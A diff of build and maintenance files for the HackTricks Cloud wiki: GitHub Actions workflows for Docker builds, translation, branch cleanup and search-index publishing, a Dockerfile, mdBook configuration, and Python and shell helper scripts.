Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.
In any case, thanks for contributing to HackTricks!
## HackTricks Training
If you are submitting the PR so you can pass the [ARTE certification](https://hacktricks-training.com/courses/arte) exam with 2 flags instead of 3, you need to name the PR `arte-<username>`, `grte-<username>`, or `azrte-<username>`, depending on which certification you are taking.
Also, remember that grammar/syntax-only fixes won't be accepted for the exam flag reduction.
In any case, thanks for contributing to HackTricks!

56
.github/workflows/build_docker.yml vendored Normal file

@@ -0,0 +1,56 @@
name: Build and Push Docker Image
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- 'book/**'
workflow_dispatch:
concurrency: build_docker
permissions:
packages: write
id-token: write
contents: write
jobs:
build-and-push:
runs-on: ubuntu-latest
steps:
# 1. Check out the repository to get the Dockerfile
- name: Check out code
uses: actions/checkout@v3
with:
fetch-depth: 0
# 2. Log into GitHub Container Registry
- name: Log in to GHCR
uses: docker/login-action@v2
with:
registry: ghcr.io
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
# 3. Build and push
- name: Build and push Docker image
run: |
# Define image name
IMAGE_NAME=ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image
# Build Docker image
docker build -t $IMAGE_NAME:latest .
# Push Docker image to GHCR
docker push $IMAGE_NAME:latest
# Set image visibility to public
curl -X PATCH \
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/packages/container/translator-image/visibility \
-d '{"visibility":"public"}'


@@ -14,12 +14,15 @@ on:
concurrency: build_master
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
steps:
@@ -27,32 +30,65 @@ jobs:
uses: actions/checkout@v4
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=en mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
# Cat hacktricks-preprocessor.log
#- name: Cat hacktricks-preprocessor.log
# run: cat hacktricks-preprocessor.log
- name: Install GitHub CLI
run: |
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y
- name: Publish search index release asset
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
set -euo pipefail
ASSET="book/searchindex.js"
TAG="searchindex-en"
TITLE="Search Index (en)"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
if [ -z "$TOKEN" ]; then
echo "No token available for GitHub CLI" >&2
exit 1
fi
export GH_TOKEN="$TOKEN"
# Delete the release if it exists
echo "Checking if release $TAG exists..."
if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
echo "Release $TAG already exists, deleting it..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
echo "Failed to delete release, trying without cleanup-tag..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
echo "Warning: Could not delete existing release, will try to recreate..."
}
}
sleep 2 # Give GitHub API a moment to process the deletion
else
echo "Release $TAG does not exist, proceeding with creation..."
fi
# Create new release (with force flag to overwrite if deletion failed)
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
echo "Failed to create release, trying with force flag..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
sleep 2
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
}
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3

204
.github/workflows/cleanup_branches.yml vendored Normal file

@@ -0,0 +1,204 @@
name: Cleanup Merged/Closed PR Branches
on:
schedule:
- cron: '0 2 * * 0' # Every Sunday at 2 AM UTC
workflow_dispatch: # Allow manual triggering
inputs:
dry_run:
description: 'Dry run (show what would be deleted without actually deleting)'
required: false
default: 'false'
type: boolean
permissions:
contents: write
pull-requests: read
jobs:
cleanup-branches:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
with:
fetch-depth: 0 # Need full history to see all branches
token: ${{ secrets.PAT_TOKEN }}
- name: Install GitHub CLI
run: |
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y
- name: Configure git
run: |
git config --global user.email "action@github.com"
git config --global user.name "GitHub Action"
- name: Cleanup merged/closed PR branches
env:
GH_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
echo "Starting branch cleanup process..."
# Check if this is a dry run
DRY_RUN="${{ github.event.inputs.dry_run || 'false' }}"
if [ "$DRY_RUN" = "true" ]; then
echo "🔍 DRY RUN MODE - No branches will actually be deleted"
echo ""
fi
# Define protected branches and patterns
protected_branches=(
"master"
"main"
)
# Translation branch patterns (any 2-letter combination)
translation_pattern="^[a-zA-Z]{2}$"
# Get all remote branches except protected ones
echo "Fetching all remote branches..."
git fetch --all --prune
# Get list of all remote branches (excluding HEAD)
all_branches=$(git branch -r | grep -v 'HEAD' | sed 's/origin\///' | grep -v '^$')
# Get all open PRs to identify branches with open PRs
echo "Getting list of open PRs..."
open_pr_branches=$(gh pr list --state open --json headRefName --jq '.[].headRefName' | sort | uniq)
echo "Open PR branches:"
echo "$open_pr_branches"
echo ""
deleted_count=0
skipped_count=0
for branch in $all_branches; do
branch=$(echo "$branch" | xargs) # Trim whitespace
# Skip if empty
if [ -z "$branch" ]; then
continue
fi
echo "Checking branch: $branch"
# Check if it's a protected branch
is_protected=false
for protected in "${protected_branches[@]}"; do
if [ "$branch" = "$protected" ]; then
echo " ✓ Skipping protected branch: $branch"
is_protected=true
skipped_count=$((skipped_count + 1))
break
fi
done
if [ "$is_protected" = true ]; then
continue
fi
# Check if it's a translation branch (any 2-letter combination)
# Also protect any branch that starts with 2 letters followed by additional content
if echo "$branch" | grep -Eq "$translation_pattern" || echo "$branch" | grep -Eq "^[a-zA-Z]{2}[_-]"; then
echo " ✓ Skipping translation/language branch: $branch"
skipped_count=$((skipped_count + 1))
continue
fi
# Check if branch has an open PR
if echo "$open_pr_branches" | grep -Fxq "$branch"; then
echo " ✓ Skipping branch with open PR: $branch"
skipped_count=$((skipped_count + 1))
continue
fi
# Check if branch had a PR that was merged or closed
echo " → Checking PR history for branch: $branch"
# Look for PRs from this branch (both merged and closed)
pr_info=$(gh pr list --state all --head "$branch" --json number,state,mergedAt --limit 1)
if [ "$pr_info" != "[]" ]; then
pr_state=$(echo "$pr_info" | jq -r '.[0].state')
pr_number=$(echo "$pr_info" | jq -r '.[0].number')
merged_at=$(echo "$pr_info" | jq -r '.[0].mergedAt')
if [ "$pr_state" = "MERGED" ] || [ "$pr_state" = "CLOSED" ]; then
if [ "$DRY_RUN" = "true" ]; then
echo " 🔍 [DRY RUN] Would delete branch: $branch (PR #$pr_number was $pr_state)"
deleted_count=$((deleted_count + 1))
else
echo " ✗ Deleting branch: $branch (PR #$pr_number was $pr_state)"
# Delete the remote branch
if git push origin --delete "$branch" 2>/dev/null; then
echo " Successfully deleted remote branch: $branch"
deleted_count=$((deleted_count + 1))
else
echo " Failed to delete remote branch: $branch"
fi
fi
else
echo " ✓ Skipping branch with open PR: $branch (PR #$pr_number is $pr_state)"
skipped_count=$((skipped_count + 1))
fi
else
# No PR found for this branch - it might be a stale branch
# Check if branch is older than 30 days and has no recent activity
last_commit_date=$(git log -1 --format="%ct" origin/"$branch" 2>/dev/null || echo "0")
if [ "$last_commit_date" != "0" ] && [ -n "$last_commit_date" ]; then
# Calculate 30 days ago in seconds since epoch
thirty_days_ago=$(($(date +%s) - 30 * 24 * 60 * 60))
if [ "$last_commit_date" -lt "$thirty_days_ago" ]; then
if [ "$DRY_RUN" = "true" ]; then
echo " 🔍 [DRY RUN] Would delete stale branch (no PR, >30 days old): $branch"
deleted_count=$((deleted_count + 1))
else
echo " ✗ Deleting stale branch (no PR, >30 days old): $branch"
if git push origin --delete "$branch" 2>/dev/null; then
echo " Successfully deleted stale branch: $branch"
deleted_count=$((deleted_count + 1))
else
echo " Failed to delete stale branch: $branch"
fi
fi
else
echo " ✓ Skipping recent branch (no PR, <30 days old): $branch"
skipped_count=$((skipped_count + 1))
fi
else
echo " ✓ Skipping branch (cannot determine age): $branch"
skipped_count=$((skipped_count + 1))
fi
fi
echo ""
done
echo "=================================="
echo "Branch cleanup completed!"
if [ "$DRY_RUN" = "true" ]; then
echo "Branches that would be deleted: $deleted_count"
else
echo "Branches deleted: $deleted_count"
fi
echo "Branches skipped: $skipped_count"
echo "=================================="
# Clean up local tracking branches (only if not dry run)
if [ "$DRY_RUN" != "true" ]; then
echo "Cleaning up local tracking branches..."
git remote prune origin
fi
echo "Cleanup process finished."
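The staleness check above converts the branch's last commit time to seconds since the epoch and compares it against a 30-day cutoff. The same test can be sketched in Python (the `is_stale_timestamp` helper name is illustrative, not part of the script):

```python
THIRTY_DAYS = 30 * 24 * 60 * 60  # cutoff in seconds, as in the shell script

def is_stale_timestamp(last_commit: int, now: int) -> bool:
    """Mirror the shell logic: a timestamp of 0 means the branch age could
    not be determined (skip it); otherwise the branch is stale when the
    last commit is more than 30 days before `now`."""
    return last_commit != 0 and last_commit < now - THIRTY_DAYS
```

In the script, `last_commit` comes from `git log -1 --format="%ct" origin/<branch>` and `now` from `date +%s`.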

.github/workflows/translate_all.yml vendored Normal file

@@ -0,0 +1,195 @@
name: Translator All
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
permissions:
packages: write
id-token: write
contents: write
jobs:
translate:
name: Translate → ${{ matrix.name }} (${{ matrix.branch }})
runs-on: ubuntu-latest
environment: prod
# Run N languages in parallel (tune max-parallel if needed)
strategy:
fail-fast: false
# max-parallel: 3  # leave unset to run all languages in parallel
matrix:
include:
- { name: "Afrikaans", language: "Afrikaans", branch: "af" }
- { name: "German", language: "German", branch: "de" }
- { name: "Greek", language: "Greek", branch: "el" }
- { name: "Spanish", language: "Spanish", branch: "es" }
- { name: "French", language: "French", branch: "fr" }
- { name: "Hindi", language: "Hindi", branch: "hi" }
- { name: "Italian", language: "Italian", branch: "it" }
- { name: "Japanese", language: "Japanese", branch: "ja" }
- { name: "Korean", language: "Korean", branch: "ko" }
- { name: "Polish", language: "Polish", branch: "pl" }
- { name: "Portuguese", language: "Portuguese", branch: "pt" }
- { name: "Serbian", language: "Serbian", branch: "sr" }
- { name: "Swahili", language: "Swahili", branch: "sw" }
- { name: "Turkish", language: "Turkish", branch: "tr" }
- { name: "Ukrainian", language: "Ukrainian", branch: "uk" }
- { name: "Chinese", language: "Chinese", branch: "zh" }
# Ensure only one job per branch runs at a time (even across workflow runs)
concurrency:
group: translate-${{ matrix.branch }}
cancel-in-progress: false
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
env:
LANGUAGE: ${{ matrix.language }}
BRANCH: ${{ matrix.branch }}
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Update and download scripts
run: |
sudo apt-get update
# Install GitHub CLI properly
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y \
&& sudo apt-get install -y wget
wget -O /tmp/get_and_save_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/get_and_save_refs.py
wget -O /tmp/compare_and_fix_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/compare_and_fix_refs.py
wget -O /tmp/translator.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/translator.py
- name: Run get_and_save_refs.py
run: |
python /tmp/get_and_save_refs.py
- name: Download language branch & update refs
run: |
pwd
ls -la
git config --global --add safe.directory "$GITHUB_WORKSPACE"
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
python /tmp/compare_and_fix_refs.py --files-unmatched-paths /tmp/file_paths.txt
git add .
git commit -m "Fix unmatched refs" || echo "No changes to commit"
git push || echo "No changes to push"
- name: Run translation script on changed files
run: |
git checkout master
cp src/SUMMARY.md /tmp/master-summary.md
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n ",$file" >> /tmp/file_paths.txt
fi
done
echo "Files to translate:"
cat /tmp/file_paths.txt
echo ""
echo ""
touch /tmp/file_paths.txt
if [ -s /tmp/file_paths.txt ]; then
python /tmp/translator.py \
--language "$LANGUAGE" \
--branch "$BRANCH" \
--api-key "$OPENAI_API_KEY" \
-f "$(cat /tmp/file_paths.txt)" \
-t 3
else
echo "No markdown files changed, skipping translation."
fi
- name: Sync SUMMARY.md from master
run: |
git checkout "$BRANCH"
git pull
if [ -f /tmp/master-summary.md ]; then
cp /tmp/master-summary.md src/SUMMARY.md
git add src/SUMMARY.md
git commit -m "Sync SUMMARY.md with master" || echo "SUMMARY already up to date"
git push || echo "No SUMMARY updates to push"
else
echo "master summary not exported; failing"
exit 1
fi
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Publish search index release asset
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
set -euo pipefail
ASSET="book/searchindex.js"
TAG="searchindex-${BRANCH}"
TITLE="Search Index (${BRANCH})"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
if [ -z "$TOKEN" ]; then
echo "No token available for GitHub CLI" >&2
exit 1
fi
export GH_TOKEN="$TOKEN"
# Delete the release if it exists
if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
echo "Release $TAG already exists, deleting it..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
fi
# Create new release
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-cloud/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat
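The "Run translation script on changed files" step in the workflow above filters `git diff --name-only HEAD~1` down to markdown files, dropping `SUMMARY.md` because it is synced separately. That filter can be sketched as a small Python helper (a hypothetical function, not part of the workflow):

```python
def filter_translatable(paths):
    """Keep only markdown files, excluding SUMMARY.md (synced separately)."""
    return [p for p in paths if p.endswith(".md") and "SUMMARY.md" not in p]

# Example input mimicking `git diff --name-only HEAD~1` output
changed = ["src/SUMMARY.md", "src/aws/lambda.md", "theme/ai.js", "Dockerfile"]
to_translate = filter_translatable(changed)  # only src/aws/lambda.md survives
```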

.github/workflows/upload_ht_to_ai.yml vendored Normal file

@@ -0,0 +1,23 @@
name: Upload HackTricks to HackTricks AI
on:
workflow_dispatch:
schedule:
- cron: "0 5 1 * *"
jobs:
download-clean-push:
runs-on: ubuntu-latest
environment: prod
steps:
# 1. Download the script
- name: Download script
run: wget "https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/master/scripts/upload_ht_to_ai.py"
- name: Install pip dependencies
run: python3 -m pip install openai
# 2. Execute the script
- name: Execute script
run: export MY_OPENAI_API_KEY=${{ secrets.MY_OPENAI_API_KEY }}; python3 "./upload_ht_to_ai.py"

.gitignore vendored

@@ -35,3 +35,4 @@ book
book/*
hacktricks-preprocessor.log
hacktricks-preprocessor-error.log
searchindex.js

Dockerfile Normal file

@@ -0,0 +1,31 @@
# Use the official Python 3.12 Bullseye image as the base
FROM python:3.12-bullseye
# Install system dependencies
RUN apt-get update && apt-get install -y \
curl \
wget \
git \
sudo \
build-essential \
awscli
# Install Python libraries
RUN pip install --upgrade pip && \
pip install openai tqdm tiktoken
# Install Rust & Cargo
RUN curl https://sh.rustup.rs -sSf | sh -s -- -y
ENV PATH="/root/.cargo/bin:${PATH}"
# Install mdBook & plugins
RUN cargo install mdbook
RUN cargo install mdbook-alerts
RUN cargo install mdbook-reading-time
RUN cargo install mdbook-pagetoc
RUN cargo install mdbook-tabs
RUN cargo install mdbook-codename
# Set the working directory
WORKDIR /app


@@ -1,34 +0,0 @@
# HackTricks Cloud
{{#include ./banners/hacktricks-training.md}}
<figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
> Welcome to the page where you will find each **hacking trick/technique/whatever** related to **CI/CD & Cloud** I have learnt in **CTFs**, **real life environments**, **researching**, and **reading** research and news.
### **Pentesting CI/CD Methodology**
**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
**Check them in:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
### Github Stats
![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
{{#include ./banners/hacktricks-training.md}}

README.md Symbolic link

@@ -0,0 +1 @@
src/README.md


@@ -1,6 +1,7 @@
[book]
authors = ["HackTricks Team"]
language = "en"
multilingual = false
src = "src"
title = "HackTricks Cloud"
@@ -8,17 +9,26 @@ title = "HackTricks Cloud"
create-missing = false
extra-watch-dirs = ["translations"]
[preprocessor.alerts]
after = ["links"]
[preprocessor.reading-time]
[preprocessor.pagetoc]
[preprocessor.tabs]
[preprocessor.codename]
[preprocessor.hacktricks]
command = "python3 ./hacktricks-preprocessor.py"
env = "prod"
[output.html]
additional-css = ["theme/tabs.css", "theme/pagetoc.css"]
additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
additional-js = [
"theme/tabs.js",
"theme/pagetoc.js",
"theme/tabs.js",
"theme/ht_searcher.js",
"theme/sponsor.js",
"theme/ai.js"
@@ -26,7 +36,6 @@ additional-js = [
no-section-label = true
preferred-dark-theme = "hacktricks-dark"
default-theme = "hacktricks-light"
hash-files = false
[output.html.fold]
enable = true # whether or not to enable section folding


@@ -53,17 +53,11 @@ def ref(matchobj):
if href.endswith("/"):
href = href+"README.md" # Fix if ref points to a folder
if "#" in href:
result = findtitle(href.split("#")[0], book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(href.split("#")[0], book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()
logger.debug(f'Ref has # using title: {title}')
else:
result = findtitle(href, book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(href, book, "source_path")
logger.debug(f'Recursive title search result: {chapter["name"]}')
title = chapter['name']
except Exception as e:
@@ -71,17 +65,11 @@ def ref(matchobj):
dir = path.dirname(current_chapter['source_path'])
logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}')
if "#" in href:
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()
logger.debug(f'Ref has # using title: {title}')
else:
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = chapter["name"]
logger.debug(f'Recursive title search result: {chapter["name"]}')
except Exception as e:
@@ -159,14 +147,8 @@ if __name__ == '__main__':
context, book = json.load(sys.stdin)
logger.debug(f"Context: {context}")
logger.debug(f"Book keys: {book.keys()}")
# Handle both old (sections) and new (items) mdbook API
book_items = book.get('sections') or book.get('items', [])
for chapter in iterate_chapters(book_items):
if chapter is None:
continue
for chapter in iterate_chapters(book['sections']):
logger.debug(f"Chapter: {chapter['path']}")
current_chapter = chapter
# regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'


@@ -0,0 +1,88 @@
#!/bin/bash
# Define the image folder and the root of your project
IMAGE_FOLDER="./src/images"
PROJECT_ROOT="."
# Move to the project root
cd "$PROJECT_ROOT" || exit
# Loop through each image file in the folder
find "$IMAGE_FOLDER" -type f | while IFS= read -r image; do
# Extract the filename without the path
image_name=$(basename "$image")
# If image file name contains "sponsor", skip it
# Skip sponsor/branding images that may be referenced dynamically
case "$image_name" in
*sponsor*|*arte*|*grte*|*azrte*|*websec*|*venacus*|*CLOUD*|*cloud.gif*|*CH_logo*|*lasttower*)
echo "Skipping protected image: $image_name"
continue
;;
esac
echo "Checking image: $image_name"
# Search for the image name using rg and capture the result
search_result=$(rg -F --files-with-matches "$image_name" \
--no-ignore --hidden \
--glob '!.git/*' \
--glob "!$IMAGE_FOLDER/*" < /dev/null)
echo "Search result: $search_result"
# If rg doesn't find any matches, delete the image
if [ -z "$search_result" ]; then
echo "Deleting unused image: $image"
rm "$image"
else
echo "Image used: $image_name"
echo "$search_result"
fi
done
echo "Cleanup completed!"


@@ -0,0 +1,165 @@
#!/usr/bin/env python3
import argparse
import json
import re
from pathlib import Path
SRC_DIR = Path("./src")
REFS_JSON = Path("/tmp/refs.json")
# Matches content between {{#ref}} and {{#endref}}, including newlines, lazily
REF_RE = re.compile(r"{{#ref}}\s*([\s\S]*?)\s*{{#endref}}", re.MULTILINE)
def extract_refs(text: str):
"""Return a list of refs (trimmed) in appearance order."""
return [m.strip() for m in REF_RE.findall(text)]
def replace_refs_in_text(text: str, new_refs: list):
"""Replace all refs in text with new_refs, maintaining order."""
matches = list(REF_RE.finditer(text))
if len(matches) != len(new_refs):
return text # Can't replace if counts don't match
# Replace from end to beginning to avoid offset issues
result = text
for match, new_ref in zip(reversed(matches), reversed(new_refs)):
# Get the full match span to replace the entire {{#ref}}...{{#endref}} block
start, end = match.span()
# Format the replacement with proper newlines
formatted_replacement = f"{{{{#ref}}}}\n{new_ref}\n{{{{#endref}}}}"
result = result[:start] + formatted_replacement + result[end:]
return result
def main():
parser = argparse.ArgumentParser(description="Compare and fix refs between current branch and master branch")
parser.add_argument("--files-unmatched-paths", type=str,
help="Path to file where unmatched file paths will be saved (comma-separated on first line)")
args = parser.parse_args()
if not SRC_DIR.is_dir():
raise SystemExit(f"Not a directory: {SRC_DIR}")
if not REFS_JSON.exists():
raise SystemExit(f"Reference file not found: {REFS_JSON}")
# Load the reference refs from master branch
try:
with open(REFS_JSON, 'r', encoding='utf-8') as f:
master_refs = json.load(f)
except (json.JSONDecodeError, UnicodeDecodeError) as e:
raise SystemExit(f"Error reading {REFS_JSON}: {e}")
print(f"Loaded reference data for {len(master_refs)} files from {REFS_JSON}")
files_processed = 0
files_modified = 0
files_with_differences = 0
unmatched_files = [] # Track files with unmatched refs
# Track which files exist in current branch
current_files = set()
for md_path in sorted(SRC_DIR.rglob("*.md")):
rel = md_path.relative_to(SRC_DIR).as_posix()
rel_with_src = f"{SRC_DIR.name}/{rel}" # Include src/ prefix for output
files_processed += 1
# Track this file as existing in current branch
current_files.add(rel)
try:
content = md_path.read_text(encoding="utf-8")
except UnicodeDecodeError:
# Fallback if encoding is odd
content = md_path.read_text(errors="replace")
current_refs = extract_refs(content)
# Check if file exists in master refs
if rel not in master_refs:
if current_refs:
print(f"⚠️ NEW FILE with refs: {rel_with_src} (has {len(current_refs)} refs)")
files_with_differences += 1
unmatched_files.append(rel_with_src)
continue
master_file_refs = master_refs[rel]
# Compare ref counts
if len(current_refs) != len(master_file_refs):
print(f"📊 REF COUNT MISMATCH: {rel_with_src} -- Master: {len(master_file_refs)} refs, Current: {len(current_refs)} refs")
files_with_differences += 1
unmatched_files.append(rel_with_src)
continue
# If no refs in either, skip
if not current_refs and not master_file_refs:
continue
# Compare individual refs
differences_found = False
for i, (current_ref, master_ref) in enumerate(zip(current_refs, master_file_refs)):
if current_ref != master_ref:
if not differences_found:
print(f"🔍 REF DIFFERENCES in {rel_with_src}:")
differences_found = True
print(f" Ref {i+1}:")
print(f" Master: {repr(master_ref)}")
print(f" Current: {repr(current_ref)}")
if differences_found:
files_with_differences += 1
unmatched_files.append(rel_with_src)
# Replace current refs with master refs
try:
new_content = replace_refs_in_text(content, master_file_refs)
if new_content != content:
md_path.write_text(new_content, encoding="utf-8")
files_modified += 1
print(f" ✅ Fixed refs in {rel_with_src}")
else:
print(f" ❌ Failed to replace refs in {rel_with_src}")
except Exception as e:
print(f" ❌ Error fixing refs in {rel_with_src}: {e}")
# Check for files that exist in master refs but not in current branch
unexisted_files = 0
for master_file_rel in master_refs.keys():
if master_file_rel not in current_files:
rel_with_src = f"{SRC_DIR.name}/{master_file_rel}"
print(f"🗑️ {rel_with_src} (existed in master but not in current one)")
unexisted_files += 1
unmatched_files.append(rel_with_src)
# Save unmatched files to specified path if requested
if args.files_unmatched_paths and unmatched_files:
try:
unmatched_paths_file = Path(args.files_unmatched_paths)
unmatched_paths_file.parent.mkdir(parents=True, exist_ok=True)
with open(unmatched_paths_file, 'w', encoding='utf-8') as f:
f.write(','.join(list(set(unmatched_files))))
print(f"📝 Saved {len(unmatched_files)} unmatched file paths to: {unmatched_paths_file}")
except Exception as e:
print(f"❌ Error saving unmatched paths to {args.files_unmatched_paths}: {e}")
elif args.files_unmatched_paths and not unmatched_files:
# Create empty file if no unmatched files found
try:
unmatched_paths_file = Path(args.files_unmatched_paths)
unmatched_paths_file.parent.mkdir(parents=True, exist_ok=True)
unmatched_paths_file.write_text('\n', encoding='utf-8')
print(f"✅ No unmatched files found. Created empty file: {unmatched_paths_file}")
except Exception as e:
print(f"❌ Error creating empty unmatched paths file {args.files_unmatched_paths}: {e}")
print(f"\n SUMMARY:")
print(f" Files processed: {files_processed}")
print(f" Files with different refs: {files_with_differences}")
print(f" Files modified: {files_modified}")
print(f" Non existing files: {unexisted_files}")
if unmatched_files:
print(f" Unmatched files: {len(unmatched_files)}")
if __name__ == "__main__":
main()
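A quick sketch of how the `REF_RE` pattern defined above extracts a ref and rewrites the whole `{{#ref}}...{{#endref}}` block (the sample markdown and paths are made up for illustration):

```python
import re

# Same pattern as in the script above
REF_RE = re.compile(r"{{#ref}}\s*([\s\S]*?)\s*{{#endref}}", re.MULTILINE)

sample = "Intro\n{{#ref}}\naws/lambda-persistence.md\n{{#endref}}\nOutro"

# Extraction: capture groups are the ref bodies, in appearance order
refs = [m.strip() for m in REF_RE.findall(sample)]

# Rewriting: substituting over the full match keeps the surrounding text intact
fixed = REF_RE.sub("{{#ref}}\naws/lambda-post-exploitation.md\n{{#endref}}", sample)
```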


@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import json
import re
from pathlib import Path
SRC_DIR = Path("./src")
REFS_JSON = Path("/tmp/refs.json")
